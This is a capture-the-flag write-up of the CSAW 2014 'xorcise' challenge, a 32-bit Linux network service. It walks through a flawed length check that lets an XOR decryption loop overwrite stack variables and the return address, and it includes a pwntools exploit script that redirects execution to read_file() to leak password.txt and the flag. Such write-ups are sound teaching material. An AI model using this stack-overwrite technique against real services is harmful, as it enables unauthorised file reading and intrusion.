Security and stuff

CSAW 2014 Exploit 500 writeup : xorcise


The CSAW 2014 Exploit500 challenge was a Linux 32-bit network service for which the executable and the source code were provided (I saved a copy of the source code here). The service accepts packets defined by the structure cipher_data and first applies a decryption loop to the received data.

struct cipher_data
    uint8_t length;
    uint8_t key[8];
    uint8_t bytes[128];
typedef struct cipher_data cipher_data;

The service provides multiple commands, however the 2 interesting ones read_file and system require your packet to be authenticated. The authentication verification is done in is_authenticated() and computes an authentication checksum based on a password read from the local file 'password.txt'. This check does not seem to be vulnerable.

My teammate EiNSTeiN_ discovered that there is a flaw in the decipher() method that does the decryption of the data. The function allocates a buffer buf which will contain the decrypted data, the allocated size is MAX_BLOCKS * BLOCK_SIZE which is 128 bytes. The copy of the packet bytes to the buffer is done safely with memcpy.

#define BLOCK_SIZE 8
#define MAX_BLOCKS 16
memcpy(buf, data->bytes, sizeof(buf));

There is also a check to ensure that the decryption loop does not process more than the size of buf[].

if ((data->length / BLOCK_SIZE) > MAX_BLOCKS)
    data->length = BLOCK_SIZE * MAX_BLOCKS;

But this check is flawed because of rounding; we can pass a value of 135 which will pass the check (135 / 8 equals 16 which is not bigger than MAX_BLOCKS). The decryption loop is applied by blocks of 8 bytes, so we are able to apply it to 8 bytes outside the bounds of buf[].

for (loop = 0; loop < data->length; loop += 8)
    for (block_index = 0; block_index < 8; ++block_index)
        buf[loop+block_index] ^= (xor_mask^data->key[block_index]);

If we look at the stack layout of decipher() we see that those 8 bytes are the variables xor_mask, block_index and the first 3 bytes of loop.

-00000095 buf             db 128 dup(?)
-00000015 xor_mask        db ?
-00000014 block_index     dd ?
-00000010 loop            dd ?

Exploitation Strategy

The strategy I went for is to modify the value of loop to make it point on the return address of decipher() and modify its 2 first bytes to make it return somewhere else. Hopefully we can find an interesting place to jump to.

Let's go through the modification of the bytes one at a time. The first one is xor_mask. At this point block_index equals 0. We know 2 of the values in the decryption (xor_mask = 0x8F and buf[loop+block_index] = 0x8F), so we can set key[block_index] to get the output value we want. Let's set xor_mask to 0 to make the next steps easier. 0x8F ^ 0x8F ^ 0x00 equals 0x00, so this is the value we will put at key[0].

variable: prev_val   block_index  new_val key_value
xor_mask: 0x8F       0            0x00    key[0] = 0x00

Next up is the first byte of block_index, at this point it is equal to 1. We will keep its value at 1 so the decryption loop continues normally. As we have modified xor_mask to 0x00, the computation is now 0x01 ^ 0x01 ^ 0x00 which equals 0x00, we put this value in key[1]. We will also leave the other bytes of block_index unchanged. Here is the updated table:

variable       : prev_val   block_index  new_val key_value
xor_mask       : 0x8F       0            0x00    key[0] = 0x00
block_index[0] : 0x01       1            0x01    key[1] = 0x00
block_index[1] : 0x00       2            0x00    key[2] = 0x00
block_index[2] : 0x00       3            0x00    key[3] = 0x00
block_index[3] : 0x00       4            0x00    key[4] = 0x00

We can now modify the first byte of loop. Its current value is 0x80 (128), the value we need to make buf[loop+block_index] modify the return address at this point is 0x93, so that will give us key[5] = 0x13.

variable: prev_val   block_index  new_val key_value
loop[0] : 0x80       5            0x93    key[5] = 0x13

We are now able to modify the return address of decipher(), we're making good progress. So where do we want to make the program jump? There is a call to read_file() in process_connection(), this command reads the content of a file and sends its content back to us, we could use it to read the content of 'password.txt'.

.text:08049279                 mov     eax, [ebp+var_10]
.text:0804927C                 add     eax, 8
.text:0804927F                 sub     esp, 8
.text:08049282                 push    eax
.text:08049283                 push    offset aReadFileReques ; "Read File Request: %s\n"
.text:08049288                 call    _printf
.text:0804928D                 add     esp, 10h
.text:08049290                 mov     eax, [ebp+var_10]
.text:08049293                 add     eax, 8
.text:08049296                 sub     esp, 8
.text:08049299                 push    eax             ; filename
.text:0804929A                 push    [ebp+fd]        ; fd
.text:0804929D                 call    read_file

There is a little detail to keep in mind, there is a stack adjustment after the call to decipher(). As we are hijacking the return address the stack will not be properly readjusted.

.text:0804918F                 call    decipher
.text:08049194                 add     esp, 10h
;274     packet = (request *)&decrypted;
.text:08049197                 lea     eax, [ebp+var_11D]
.text:0804919D                 mov     [ebp+var_10], eax

My first thought was to jump at 0x0804928D which does the same stack adjustment and then sets the correct parameters for the call to read_file(). However this approach does not work as the value of var_10 is set only after the call to decipher(). Bummer.

I then noticed that the address of filename is passed via eax at 0x08049299 and by luck at the end of decipher() eax points inside buf[]. So the last thing I needed to do was to adjust the initial packet content so that it contained password.txt\x00' XOR 0x8F XOR the key. Here is the final content of the variable smashing table.

variable       : prev_val   block_index  new_val key_value
xor_mask       : 0x8F       0            0x00    key[0] = 0x00
block_index[0] : 0x01       1            0x01    key[1] = 0x00
block_index[1] : 0x00       2            0x00    key[2] = 0x00
block_index[2] : 0x00       3            0x00    key[3] = 0x00
block_index[3] : 0x00       4            0x00    key[4] = 0x00
loop[0]        : 0x80       5            0x93    key[5] = 0x13
at this point buf[loop+block_index] overwrites retaddr
retaddr[1]     : 0x94       6            0x99    key[6] = 0x0d
retaddr[2]     : 0x91       7            0x92    key[7] = 0x03

Putting it all together

Below is the source code of my exploit, I used the pwntools python library by Gallopsled which saved me a ton of time, definitely check it out.

from pwn import *
#sock = remote("", 24001)
sock = remote("", 24001)
key = "\x00\x00\x00\x00\x00\x13\x0d\x03"
packet  = ""
packet += chr(135) # cipher_data.length = 135
packet += key # key
packet += "A"
#packet += xor(xor("password.txt\x00", "\x00\x00\x00\x00\x13\x0d\x03\x00"), 0x8f)
packet += xor(xor("flag.txt\x00", "\x00\x00\x00\x00\x13\x0d\x03\x00"), 0x8f)
packet += "A"* (140 - len(packet))

And finally the exploit in action :

[ekse@xubuntu] : ~/csaw/exploit500 $ python
[+] Opening connection to on port 24001: OK
[*] Switching to interactive mode
[*] Got EOF while reading in interactive

So the password was 'pass123'. It was kind of depressing to have worked so much for such a weaksauce password, the CSAW CTF organizers really are a bunch of trolls. Now we could implement the packet authentication and call the system command to list the files on the server, but I guessed the flag was probably in 'flag.txt' and used the exploit to read that file instead :-)

The flag was flag{code_exec>=crypto_break}.

Thanks to drraid for this great challenge and to the CSAW organizers for such a great CTF!